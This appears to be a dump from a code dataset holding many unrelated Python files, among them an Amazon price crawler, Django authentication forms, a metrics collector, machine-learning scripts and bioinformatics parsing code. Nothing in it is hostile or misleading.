"timestamp": datetime.strptime(timestamp, "%Y-%m-%d")
}
)
def truncate(self):
db.county.drop() |
13,148 | bffe76b7a517791aadfd3b12104500189f472a2d | __author__ = 'tomislav'
from celery.decorators import periodic_task,task
from .amazon_api import ProductAdvertisingAPI
from .models import Settings
from datetime import timedelta,datetime
import logging
import requests
import lxml.html
import re
from .models import Item
class Parser:
def __call__(self, *args, **kwargs):
return lxml.html.fromstring(args[0].text)
@staticmethod
def get_price_value(price_string):
price_string = price_string.replace(",", ".")
price = re.search('[^\d]*([\d]+(\.\d\d)?).*', price_string)
if price:
result = float(price.group(1))
else:
result = None
return result
class AmazonCrawler:
session = requests.session()
def extract_price(self,sel,item):
price = sel.xpath("//span[@id='priceblock_dealprice']")
if not price:
price = sel.xpath("//span[@id='priceblock_ourprice']")
if price:
price = Parser.get_price_value(price[0].text)
if not price:
logging.error("no price found for url={}".format(item.url))
import ipdb;ipdb.set_trace()
else:
return price
def extract_name(self,sel,item):
name = sel.xpath("//span[@id='productTitle']")
if name:
return name[0].text
else:
logging.error("no name found for url={}".format(item.url))
return None
def parse(self,item):
parser = Parser()
sel = parser(self.session.get(item.url))
price = self.extract_price(sel,item)
name = self.extract_name(sel,item)
item.name = name;
item.update_price(price)
class AmazonAPICrawler(ProductAdvertisingAPI):
def get_asin_from_url(self,url):
asin = re.findall("\/dp\/([A-Z0-9]+)",url)
if asin:
return asin[0]
else:
return None
def parse(self,id,crawler):
i = Item.query.filter_by(id=id).one()
asin_from_url = self.get_asin_from_url(i.url)
asin = asin_from_url if "http" not in asin_from_url else i.url
if asin:
pd = self.item_lookup([asin])
if pd:
i.name = pd[asin]['title']
i.update_price(pd[asin]['price'])
else:
i.name = "wrong url or asin"
i.update_price(-1)
def call_amazon_api_task(i):
crawler = AmazonAPICrawler()
crawler.parse(i.id,crawler)
@periodic_task(run_every=timedelta(seconds=5))
def check_database_for_new_items():
i = Item.query.filter_by(new_price=0).first()
if i:
call_amazon_api_task(i)
else:
i = Item.query.filter_by(old_price=0).first()
if i:
call_amazon_api_task(i)
@periodic_task(run_every=timedelta(seconds=5))
def update_listing():
since = datetime.now() - timedelta(minutes=5)
i = Item.query.filter(Item.updated<since).first()
call_amazon_api_task(i)
@periodic_task(run_every=timedelta(seconds=5))
def send_email():
import smtplib
pd = Settings.query.all()[-1]
items = Item.query.filter_by(email_notify=0)
fromaddr = 'no-reply@162.243.60.11'
toaddrs = pd.Send_to
if items:
if pd.Percent.isdigit():
percent = int(pd.Percent)
else:
percent = 5
msg ="Hello,\n"
for i in items:
if abs(i.percent)>percent:
msg += 'Item {} has changed his price from {} to {}. \n'.format(i.url,i.old_price,i.new_price)
i.email_notify = 1
i.update_all()
if msg!="Hello,\n":
server = smtplib.SMTP('localhost')
server.ehlo()
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
|
13,149 | cd380f18c7d47aab90558f7754cf8554445a534b | import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import sys
sys.path.append(".")
from ..intrinsic_reward import IntrinsicReward
from .model import RNDNetwork
class RND(IntrinsicReward):
"""
Random Network Distillation (RND) class
Paper:
Burda, Y., Edwards, H., Storkey, A., & Klimov, O. (2018).
Exploration by random network distillation.
arXiv preprint arXiv:1810.12894.
Link: https://arxiv.org/abs/1810.12894
"""
def __init__(
self, state_size, action_size, hidden_dim=128, state_rep_size=64, learning_rate=1e-5, eta=2
):
"""
Initialise parameters for MARL training
:param state_size: dimension of state input
:param action_size: dimension of action input
:param hidden_dim: hidden dimension of networks
:param state_rep_size: dimension of state representation in network
:param learning_rate: learning rate for ICM parameter optimisation
:param eta: curiosity loss weighting factor
"""
super(RND, self).__init__(state_size, action_size, eta)
self.hidden_dim = hidden_dim
self.state_rep_size = state_rep_size
self.learning_rate = learning_rate
self.predictor_dev = "cpu"
self.target_dev = "cpu"
# create models
self.predictor_model = RNDNetwork(state_size, action_size, hidden_dim, state_rep_size)
self.target_model = RNDNetwork(state_size, action_size, hidden_dim, state_rep_size)
for param in self.target_model.parameters():
param.requires_grad = False
self.optimizer = optim.Adam(self.predictor_model.parameters(), lr=learning_rate)
self.loss = None
def compute_intrinsic_reward(self, state, action, next_state, use_cuda, train=False):
"""
Compute intrinsic reward for given input
:param state: (batch of) current state(s)
:param action: (batch of) applied action(s)
:param next_state: (batch of) next/reached state(s)
:param use_cuda: use CUDA tensors
:param train: flag if model should be trained
:return: (batch of) intrinsic reward(s)
"""
if use_cuda:
fn = lambda x: x.cuda()
device = "gpu"
else:
fn = lambda x: x.cpu()
device = "cpu"
if not self.predictor_dev == device:
self.predictor_model = fn(self.predictor_model)
self.predictor_dev = device
if not self.target_dev == device:
self.target_model = fn(self.target_model)
self.target_dev = device
target_feature = self.target_model(next_state)
predict_feature = self.predictor_model(next_state)
forward_loss = ((target_feature - predict_feature) ** 2).sum(-1).mean()
self.loss = forward_loss
if train:
self.optimizer.zero_grad()
self.loss.backward(retain_graph=True)
torch.nn.utils.clip_grad_norm_(self.predictor_model.parameters(), 0.5)
self.optimizer.step()
return self.eta * forward_loss
def get_losses(self):
"""
Get losses of last computation if existing
:return: list of (batch of) loss(es)
"""
if self.loss is not None:
return [self.loss]
else:
return []
|
13,150 | 5e7394292d276d30ea61260b19aea4cbd2fec09c | import torch
from laplace_v3.func_lib import yorick_delta_relu_sq
x = torch.tensor(0.5, requires_grad=True)
y = yorick_delta_relu_sq(x)
y.backward()
print(x.grad)
x = torch.tensor(2., requires_grad=True)
y = yorick_delta_relu_sq(x)
y.backward()
print(x.grad)
x = torch.tensor(0., requires_grad=True)
y = yorick_delta_relu_sq(x)
y.backward()
print(x.grad)
x = torch.tensor(1., requires_grad=True)
y = yorick_delta_relu_sq(x)
y.backward()
print(x.grad)
|
13,151 | beb2c324874fd2c1425818342c955ab481f33d17 | from django import forms
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.utils.translation import ugettext_lazy as _
class LoginForm(forms.Form):
"""
A form for logging in users
"""
email = forms.EmailField(label="E-mail", help_text = "Required",
required=True,
widget=forms.TextInput(attrs={'class':'form-control special-form-control'}))
password = forms.CharField(label="Password", help_text = "Required",
required=True,
widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))
def clean_email(self):
"""
Checks that the email has a User object associated with it
and that the User object is active
"""
e = self.cleaned_data['email']
try:
user = User.objects.get(email=e)
if not user.is_active:
msg = 'This user account has not been confirmed yet'
raise forms.ValidationError(msg)
except User.DoesNotExist:
pass
# msg = 'This email is not associated with an account'
# raise forms.ValidationError(msg)
return e
def get_username(self):
"""
Returns the User object if the form is valid
"""
if not self.is_valid():
return None
try:
# NOTE: all emails stored in lower-case
email = self.clean_email().lower()
return User.objects.get(email=email).username
except User.DoesNotExist:
pass
return None
class SignupForm(forms.Form):
"""
A for for signing up users
"""
email = forms.EmailField(label="E-mail", help_text = "Required",
required=True,
widget=forms.TextInput(attrs={'class':'form-control special-form-control'}))
password1 = forms.CharField(label="Password", help_text = "Required",
required=True,
widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))
password2 = forms.CharField(label="Password confirmation", help_text = "Required",
required=True,
widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))
def clean_email(self):
"""
Checks that the email is not already in use
"""
# NOTE: all emails are stored in lower case
e = self.cleaned_data['email'].lower()
if User.objects.filter(email=e).count() > 0:
raise forms.ValidationError('An existing account is using that email address.')
return e
def clean_password2(self):
"""
Checks that the passwords are the same
"""
password1 = self.cleaned_data.get('password1', '')
password2 = self.cleaned_data['password2']
if password1 != password2:
raise forms.ValidationError('The passwords did not match.')
return password2
def create_user(self):
"""
Creates a User object (it will be inactive)
"""
if not self.is_valid():
return None
# generate a username
ids = User.objects.values_list('id', flat=True).order_by('-id')[:1]
if len(ids) > 0:
# ids[0] will be the maximum value (due to order_by: '-id')
idnum = ids[0] + 1
else:
idnum = 1
# create User object
username = "user%s" % idnum
# NOTE: store email in lower case
email = self.clean_email().lower()
password = self.clean_password2()
user = User(username=username, email=email, password='tmp')
user.save()
# set the real password
user.set_password(password)
# make user inactive (until user has confirmed account)
user.is_active = False
# update
user.save()
return user
class ChangePasswordForm(forms.Form):
"""
A form for changing password
"""
password1 = forms.CharField(label="Password", help_text = "Required",
required=True,
widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))
password2 = forms.CharField(label="Password confirmation", help_text = "Required",
required=True,
widget=forms.PasswordInput(attrs={'class':'form-control special-form-control'}))
def clean_password2(self):
"""
Checks that the passwords are the same
"""
password1 = self.cleaned_data.get('password1', '')
password2 = self.cleaned_data['password2']
if password1 != password2:
raise forms.ValidationError('The passwords did not match.')
return password2
def change_password(self, user):
"""
Changes the password for the given user
"""
if not self.is_valid():
return None
password = self.clean_password2()
user.set_password(password)
user.save()
return user
class ResetPasswordForm(forms.Form):
"""
A form for resetting a password
"""
email = forms.EmailField(label="E-mail", help_text = "Required",
required=True,
widget=forms.TextInput(attrs={'class':'form-control special-form-control'}))
def clean_email(self):
"""
Checks that the email is valid
"""
# NOTE: all emails are stored in lower-case
e = self.cleaned_data['email'].lower()
try:
user = User.objects.get(email=e)
if not user.is_active:
msg = 'This user account has not been confirmed yet'
raise forms.ValidationError(msg)
except User.DoesNotExist:
msg = 'This email is not associated with an account'
raise forms.ValidationError(msg)
return e
def get_user(self):
"""
Returns the User object for the email address
"""
if not self.is_valid():
return None
# error checking done in: clean_email
# NOTE: all emails are stored in lower-case
e = self.clean_email().lower()
return User.objects.get(email=e)
|
13,152 | 8d704ccbd467dbec1a67f1b1f53069eea4dd75bc | # coding=utf-8
"""
Collect [Yammer Metrics](http://metrics.codahale.com/) metrics via HTTP
#### Dependencies
* urlib2
"""
import urllib2
try:
import json
json # workaround for pyflakes issue #13
except ImportError:
import simplejson as json
import diamond.collector
class YammerCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(YammerCollector,
self).get_default_config_help()
config_help.update({
'url': 'URL from which to pull metrics',
'username': 'Username if basic auth is required',
'password': 'Password is basic auth is required',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(YammerCollector, self).get_default_config()
config.update({
'path': 'yammer',
'url': 'http://127.0.0.1:8081/metrics',
'username': '',
'password': '',
})
return config
def collect(self):
if json is None:
self.log.error('Unable to import json')
return {}
try:
if self.config['username']:
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, self.config['url'], self.config['username'], self.config['password'])
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman)))
response = urllib2.urlopen(self.config['url'])
except urllib2.HTTPError, err:
self.log.error("%s: %s", url, err)
return
try:
result = json.load(response)
except (TypeError, ValueError):
self.log.error("Unable to parse response from elasticsearch as a"
+ " json object")
return
metrics = {}
for k, v in result.items():
k = self._sanitize(k)
metrics.update(self._parseMetrics(k,v))
for key in metrics:
self.publish(key, metrics[key])
def _sanitize(self, name):
return name.replace(' ','_').replace('.','_').replace('-','_')
def _flatten(self,di):
stack = [('',di)]
while stack:
e = stack[-1]
for k, v in e[1].items():
if e[0]:
name = e[0] + '.' + self._sanitize(k)
else:
name = self._sanitize(k)
if isinstance(v, dict):
stack.append((name,v))
else:
yield name, v
stack.remove(e)
def _parseMetrics(self,prefix,raw_metrics):
metrics = {}
for k, v in self._flatten(raw_metrics):
if isinstance(v,int) or isinstance(v,float):
metrics[prefix + '.' + k] = v
return metrics
|
13,153 | 906ad4c55ebd258564f3663f69659f6eab7ce429 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-12-07 00:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mainpage', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='goodsrapid',
options={'ordering': ['sort_index'], 'verbose_name': 'Товар "Прямо сейчас"', 'verbose_name_plural': 'Товары "Прямо сейчас"'},
),
migrations.AlterField(
model_name='mainaboutus',
name='text_item',
field=models.TextField(max_length=128, verbose_name='Текст "О нас"'),
),
]
|
13,154 | 9c898cd115dc27f8f06bc940ddec7ca4bce929e8 | from src import predict
from src import data
from src import neon_paths
from glob import glob
import geopandas as gpd
import traceback
from src.start_cluster import start
from src.models import multi_stage
from distributed import wait
import os
import re
from pytorch_lightning.loggers import CometLogger
from pytorch_lightning import Trainer
def find_rgb_files(site, config, year="2021"):
tiles = glob(config["rgb_sensor_pool"], recursive=True)
tiles = [x for x in tiles if site in x]
tiles = [x for x in tiles if "neon-aop-products" not in x]
tiles = [x for x in tiles if "/{}/".format(year) in x]
#tiles = [x for x in tiles if "404000_3286000" in x]
#Only allow tiles that are within OSBS station boundary
osbs_tiles = []
for rgb_path in tiles:
basename = os.path.basename(rgb_path)
geo_index = re.search("(\d+_\d+)_image", basename).group(1)
if ((float(geo_index.split("_")[0]) > 399815.5) &
(float(geo_index.split("_")[0]) < 409113.7) &
(float(geo_index.split("_")[1]) > 3282308) &
(float( geo_index.split("_")[1]) < 3290124)):
osbs_tiles.append(rgb_path)
return osbs_tiles
def convert(rgb_path, hyperspectral_pool, savedir):
#convert .h5 hyperspec tile if needed
basename = os.path.basename(rgb_path)
geo_index = re.search("(\d+_\d+)_image", basename).group(1)
h5_list = [x for x in hyperspectral_pool if geo_index in x]
tif_paths = []
for path in h5_list:
year = path.split("/")[6]
tif_basename = os.path.splitext(os.path.basename(rgb_path))[0] + "_hyperspectral_{}.tif".format(year)
tif_path = "{}/{}".format(savedir, tif_basename)
if not os.path.exists(tif_path):
tif_paths.append(neon_paths.convert_h5(path, rgb_path, savedir, year=year))
else:
tif_paths.append(tif_path)
return tif_paths
#Params
config = data.read_config("config.yml")
config["preload_images"] = False
comet_logger = CometLogger(project_name="DeepTreeAttention2", workspace=config["comet_workspace"], auto_output_logging="simple")
comet_logger.experiment.add_tag("prediction")
comet_logger.experiment.log_parameters(config)
cpu_client = start(cpus=1, mem_size="10GB")
dead_model_path = "/orange/idtrees-collab/DeepTreeAttention/Dead/snapshots/c4945ae57f4145948531a0059ebd023c.pl"
config["crop_dir"] = "/blue/ewhite/b.weinstein/DeepTreeAttention/67ec871c49cf472c8e1ae70b185addb1"
savedir = config["crop_dir"]
species_model_paths = ["/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/71f8ba53af2b46049906554457cd5429.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/ac7b4194811c4bdd9291892bccc4e661.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/b629e5365a104320bcec03843e9dd6fd.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/5ac9afabe3f6402a9c312ba4cee5160a.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/46aff76fe2974b72a5d001c555d7c03a.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/63bdab99d6874f038212ac301439e9cc.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/c871ed25dc1c4a3e97cf3b723cf88bb6.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/6d45510824d6442c987b500a156b77d6.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/83f6ede4f90b44ebac6c1ac271ea0939.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/47ee5858b1104214be178389c13bd025.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/1ccdc11bdb9a4ae897377e3e97ce88b9.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/3c7b7fe01eaa4d1b8a1187b792b8de40.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/3b6d9f2367584b3691de2c2beec47beb.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/509ef67c6050471e83199d2e9f4f3f6a.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/ae7abdd50de04bc9970295920f0b9603.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/d2180f54487b45269c1d86398d7f0fb8.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/6f9730cbe9ba4541816f32f297b536cd.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/71f8ba53af2b46049906554457cd5429.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/6a28224a2dba4e4eb7f528d19444ec4e.pt",
"/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/b9c0111b1dc0420b84e3b6b79da4e166.pt"]
#generate HSI_tif data if needed.
h5_pool = glob(config["HSI_sensor_pool"], recursive=True)
h5_pool = [x for x in h5_pool if not "neon-aop-products" in x]
hyperspectral_pool = glob(config["HSI_tif_dir"]+"*")
### Step 1 Find RGB Tiles and convert HSI
tiles = find_rgb_files(site="OSBS", config=config)
#tif_futures = cpu_client.map(
#convert,
#tiles,
#hyperspectral_pool=h5_pool,
#savedir=config["HSI_tif_dir"])
#wait(tif_futures)
for x in tiles:
basename = os.path.splitext(os.path.basename(x))[0]
shpname = "/blue/ewhite/b.weinstein/DeepTreeAttention/results/crowns/{}.shp".format(basename)
if not os.path.exists(shpname):
try:
crowns = predict.find_crowns(rgb_path=x, config=config, dead_model_path=dead_model_path)
crowns.to_file(shpname)
except Exception as e:
traceback.print_exc()
print("{} failed to build crowns with {}".format(shpname, e))
continue
crown_annotations_paths = []
crown_annotations_futures = []
for x in tiles:
basename = os.path.splitext(os.path.basename(x))[0]
shpname = "/blue/ewhite/b.weinstein/DeepTreeAttention/results/crowns/{}.shp".format(basename)
try:
crowns = gpd.read_file(shpname)
except:
continue
if not os.path.exists("/blue/ewhite/b.weinstein/DeepTreeAttention/results/crops/{}.shp".format(basename)):
written_file = predict.generate_prediction_crops(crowns, config, as_numpy=True, client=cpu_client)
crown_annotations_paths.append(written_file)
else:
crown_annotations_path = "/blue/ewhite/b.weinstein/DeepTreeAttention/results/crops/{}.shp".format(basename)
crown_annotations_paths.append(crown_annotations_path)
#Recursive predict to avoid prediction levels that will be later ignored.
trainer = Trainer(gpus=config["gpus"], logger=False, enable_checkpointing=False)
## Step 2 - Predict Crowns
for species_model_path in species_model_paths:
print(species_model_path)
# Load species model
#Do not preload weights
config["pretrained_state_dict"] = None
m = multi_stage.MultiStage.load_from_checkpoint(species_model_path, config=config)
prediction_dir = os.path.join("/blue/ewhite/b.weinstein/DeepTreeAttention/results/",
os.path.splitext(os.path.basename(species_model_path))[0])
try:
os.mkdir(prediction_dir)
except:
pass
for x in crown_annotations_paths:
results_shp = os.path.join(prediction_dir, os.path.basename(x))
if not os.path.exists(results_shp):
print(x)
try:
predict.predict_tile(
crown_annotations=x,
filter_dead=True,
trainer=trainer,
m=m,
savedir=prediction_dir,
config=config)
except Exception as e:
traceback.print_exc()
continue
|
13,155 | 2d93f3de6f5304003ad46b36e10d26aa3e0bf596 | ##coding = utf -8
## The script is mainly for mining all the inserted TEs in nested TE sequences !!
Emmer_dir='/home/lab706/jerryliu/Agenome_project/output_RM_Emmer/formated_TE/'
CS_dir='/home/lab706/jerryliu/Agenome_project/CS_format_conversion/formated_TE/'
Tu_dir='/home/lab706/jerryliu/Agenome_project/Tu_format_conversion/formated_TE/'
file_tag=['chr1A','chr2A','chr3A','chr4A','chr5A'\
,'chr6A','chr7A','chrUn']
def getnu(string):
## ## [ ( id,(xx,xx)), ...]
return int(string[1][0])
## change the [strat : end ] in the string into '1'.
def change(string, START, END, start, end):
middle=(end-start +1)*'1'
left =string[:(start-START)]
right = string[(end-START + 1):]
return left + middle + right
def getnumber(string):
##123..234
number=string.split('..')[0]
return int(number)
def getIDnum(string):
##123_Tu
number = int(string.split('_')[0])
return number
## transform the number string into positon pairs
def transform(string, START,END):
list_1=[]
i=0
point='off'
for bp in string:
if bp == '0' and point =='off':
start=START+i
i+= 1
point = 'ON'
elif bp =='0' and point == 'ON' and i != (END - START ):
i+= 1
elif bp =='0' and point =='ON' and i == (END - START):
end=START +i
list_1.append((start, end))
elif bp =='1' and point == 'ON':
end=START + i -1
point= 'off'
list_1.append((start, end))
i+=1
elif bp =='1' and point =='off':
i+= 1
return list_1
### [(1, 33), (99, 100)]
spe_list=[]
for tag in file_tag:
input_file=open(Emmer_dir+'Emmer_'+tag+'_TE.formated','r')
##step 1: generate the nested and single TE dict. sepe_dict={
## /id="1_Tu1" /post="RLG_famc1.5 /status="fragmented" C : (1,4284)
sepe_dict={}
for num, line in enumerate(input_file):
line=line.strip().split('\t')
id=str(num)+'_Emmer'
line[1] = id
pos_list=[]
for pair in line[-1].split(','):
try:
start=int(pair.split('..')[0])
end=int(pair.split('..')[1])
except:
print('error pair !')
else:
pos_list.append(start)
pos_list.append(end)
try:
START=min(pos_list)
END=max(pos_list)
except:
print('empty pos_list')
else:
position_array=(START,END)
name='\t'.join(line[0:5])
if name not in sepe_dict.keys():
sepe_dict[name] = position_array
input_file.close()
print(len(sepe_dict))
##step 2: generate the nested TE dict. nested_dict={
## 'chr1A\t21055_Tu\t/post="RLG_famc13\t/status="fragmented"\tC' : { id:(xx,xx), id:(xx,xx),
## id:(xx,xx), ...} , ID:{...}, ...}
nested_dict={}
START=0
END=0
current_pos=(START, END)
ID=''
for id, pair in sorted(sepe_dict.items(), key=getnu):
'''[ ( id,(xx,xx)), ...]'''
start=pair[0]
end=pair[1]
START=current_pos[0]
END=current_pos[1]
if start > END:
current_pos=(start, end)
ID=id
nested_dict[ID] = {}
if ID not in nested_dict[ID].keys():
nested_dict[ID][ID] = {}
nested_dict[ID][ID] = (start, end)
elif start>= START and end <= END:
if id not in nested_dict[ID].keys():
nested_dict[ID][id]={}
nested_dict[ID][id]=(start, end)
##step 3: find the single TE and other nested TEs in the big nested TEs.
final_total_dict={}
## used to carry all the finished TEs
for nested in nested_dict.keys():
for query_id, query in nested_dict[nested].items():
final_pos_list=[]
## within each nested TE
START = query[0]
END = query[1]
seq='0'*(END-START+1)
for sb_id, sb_pair in nested_dict[nested].items():
start = sb_pair[0]
end = sb_pair[1]
if start > START and end< END:
## changing the seq within the [start : end] into '1'.
seq=change(seq, START, END, start, end)
## transform the number string into position pairs
try:
pair_list=transform(seq, START, END)
except:
print('transform error!')
else:
for pair_tu in pair_list:
try:
start_nu=pair_tu[0]
end_nu=pair_tu[1]
except:
print('error final number')
else:
final_pos_list.append(str(start_nu)+'..'+str(end_nu))
final_pos_list=','.join(sorted(final_pos_list, key=getnumber))
#final_list=query_id.split('\t').append(final_pos_list)
index=(query_id.split('\t')[1])
final_list=query_id.split('\t')
final_list.append(final_pos_list)
#'\t'.join(final_list)
final_list='\t'.join(final_list)
final_total_dict[index] = final_list
#print(final_list)
### outputing the file
#output_file=open('final_version_TEs2/'+'Emmer_'+tag+'_TE.formated','w')
#for index in sorted(final_total_dict.keys(), key=getIDnum):
# output_file.write(final_total_dict[index]+'\n')
# print(final_total_dict[index])
#output_file.close()
|
13,156 | 548797889c978ebd4195a8cca39d642107192ba0 | """
Helpful utility functions
"""
from __future__ import unicode_literals
import six
import random
import time
import base64
import re
from datetime import datetime, timedelta
from dateutil import parser, tz
import logging
logger = logging.getLogger(__name__)
def to_bytes(data):
return data.encode('utf-8') if isinstance(data, unicode if six.PY2 else str) else data
def to_string(data):
return data if isinstance(data, unicode if six.PY2 else str) else data.decode('utf-8')
def base64url_encode(msg):
"""
Default b64_encode adds padding, jwt spec removes padding
:param input:
:type input: string or bytes
:return: base64 en
:rtype: bytes
"""
encoded_input = base64.urlsafe_b64encode(to_bytes(msg))
stripped_input = to_bytes(to_string(encoded_input).replace('=', ''))
return stripped_input
def base64url_decode(msg):
"""
JWT spec doesn't allow padding characters. base64url_encode removes them,
base64url_decode, adds them back in before trying to base64 decode the message
:param msg: URL safe base64 message
:type msg: string or bytes
:return: decoded data
:rtype: bytes
"""
bmsg = to_bytes(msg)
pad = len(bmsg) % 4
if pad > 0:
bmsg += b'=' * (4 - pad)
return base64.urlsafe_b64decode(bmsg)
def make_nonce():
"""
Create a nonce with timestamp included
:return: nonce
"""
time_format = '%Y-%m-%dT%H:%M:%SZ'
time_component = time.strftime(time_format, time.gmtime())
valid_chars = ''
# iterate over all the aschii characters for a list of all alpha-numeric characters
for char_index in range(0, 128):
if chr(char_index).isalpha() or chr(char_index).isalnum():
valid_chars += chr(char_index)
random_str = ''
random_chr = random.SystemRandom()
for i in range(0, 6):
random_str += random_chr.choice(valid_chars)
return '001{time_str}{random_str}'.format(time_str=time_component,
random_str=random_str)
def verify_and_burn_nonce(nonce):
"""
Ensure that the nonce is correct, less than one hour old,
and not more than two minutes in the future
Callers should also store used nonces and reject messages
with previously-used ones.
:param nonce: Nonce as created with :func:`~oneid.utils.make_nonce`
:return: True only if nonce meets validation criteria
:rtype: bool
"""
ret = re.match(r'^001[2-9][0-9]{3}-(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[01])'
r'T([01][0-9]|2[0-3])(:[0-5][0-9]){2}Z[A-Za-z0-9]{6}$', nonce)
if ret:
date = parser.parse(nonce[3:-6])
now = datetime.utcnow().replace(tzinfo=tz.tzutc())
ret = date < (now + timedelta(minutes=2)) and date > (now + timedelta(hours=-1))
return ret # TODO: keep a record (at least for the last hour) of burned nonces
|
13,157 | c17f44f328689d9ea19fed3024ea3137304bf1af | # Generated by Django 3.1 on 2020-09-11 06:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hamrokheti_home', '0004_auto_20200911_1229'),
]
operations = [
migrations.AddField(
model_name='fundfarm',
name='tenure_for_ROI',
field=models.CharField(blank=True, max_length=10, null=True),
),
]
|
13,158 | d737e899fca1ff5a4a6259745042d403f7f7bf92 | # argv[0]: Output file name.
# argv[1]: Template file name. Template file must be in templates dir.
# argv[2]: Tag(branch) name.
import sys, os
from jinja2 import Environment, FileSystemLoader
template_dir = 'templates'
env = Environment(loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), template_dir)))
template = env.get_template(sys.argv[2])
output_from_template = template.render(tag_name=sys.argv[3])
# to save the results
with open(os.path.join(os.path.dirname(__file__), sys.argv[1]), "wb") as fh:
fh.write(bytes(output_from_template, 'UTF-8'))
|
13,159 | 977fdbed24614b508bf4ffea420b8b493a95e1b9 | import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score, precision_score, r2_score, recall_score
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import mean_squared_error, r2_score
import matplotlib.pyplot as plt
import numpy as np
import textwrap
from sklearn.ensemble import GradientBoostingClassifier
X_train, X_test, y_train, y_test = train_test_split(X, y)
# X is X_train, y is y_train
def get_model_errors(model, X, y):
y_pred = model.predict(X)
accuracy = accuracy_score(y, y_pred)
precision = precision_score(y, y_pred)
recall = recall_score(y, y_pred)
return accuracy, precision, recall
def Gradient_Boosting_Classifier(X, y, learning_rate, n_estimators):
# loss could be lad, huber, or quantile. default is ls
model = GradientBoostingClassifier(learning_rate=learning_rate,
n_estimators=n_estimators,
random_state=1)
model.fit(X, y)
return model
# grad_model = Gradient_Boosting_Classifier(X_train, y_train, 0.1, 100)
# accuracy, precision, recall = get_model_errors(grad_model, X_train, y_train)
# returns R^2, MSE
def MSE_R2(model):
R2 = cross_val_score(model, X_train, y_train).mean()
MSE = abs(cross_val_score(model, X_train, y_train, scoring = 'neg_mean_squared_error').mean())
return R2, MSE |
13,160 | 6e506bfd660db54f31a26ea99e30b38a3394bb1a | import itertools
test = [5, 2, 1, 9, 50, 56]
test2 = list(itertools.permutations(test))
#print(test2)
strBuilder = ""
temp = 0
strNum = 0
for x in test2:
l = list(x)
for j in l:
strBuilder += str(j)
strNum = int(strBuilder)
strBuilder = ""
if strNum > temp:
temp = strNum
print(temp) |
13,161 | a3ce327a8a2f16d006735c14568d8704f7608149 | from django.urls import path
from transfer.api.views import TransferCreateAPIView, TransferDownloadAPIView, TransferStatisticsAPIView
urlpatterns = [
path('create/', TransferCreateAPIView.as_view()),
path('statistics/', TransferStatisticsAPIView.as_view()),
path('download/<slug:url_hash>', TransferDownloadAPIView.as_view()),
]
|
13,162 | 25982563aae0c1802876dcb67f91185ece25697e | # __author__ = Chen Meiying
# -*- coding: utf-8 -*-
# 2019/3/15 9:39
# 整理数据:在dataset1中加上涨跌幅
# 记住要改三个地方!!
import numpy as np
import pandas as pd
import h5py
dates = [ '20050401','20050501', '20050601', '20050701', '20050801', '20050901', '20051001', '20051101', '20051201', '20060101', '20060201', '20060301', '20060401', '20060501', '20060601', '20060701', '20060801', '20060901', '20061001', '20061101', '20061201', '20070101', '20070201', '20070301', '20070401', '20070501', '20070601', '20070701', '20070801', '20070901', '20071001', '20071101', '20071201', '20080101', '20080201', '20080301', '20080401', '20080501', '20080601', '20080701', '20080801', '20080901', '20081001', '20081101', '20081201', '20090101', '20090201', '20090301', '20090401', '20090501', '20090601', '20090701', '20090801', '20090901', '20091001', '20091101', '20091201', '20100101', '20100201', '20100301', '20100401', '20100501', '20100601', '20100701', '20100801', '20100901', '20101001', '20101101', '20101201', '20110101', '20110201', '20110301', '20110401', '20110501', '20110601', '20110701', '20110801', '20110901', '20111001', '20111101', '20111201', '20120101', '20120201', '20120301', '20120401', '20120501', '20120601', '20120701', '20120801', '20120901', '20121001', '20121101', '20121201', '20130101', '20130201', '20130301', '20130401', '20130501', '20130601', '20130701', '20130801', '20130901', '20131001', '20131101', '20131201', '20140101', '20140201', '20140301', '20140401', '20140501', '20140601', '20140701', '20140801', '20140901', '20141001', '20141101', '20141201', '20150101', '20150201', '20150301', '20150401', '20150501', '20150601', '20150701', 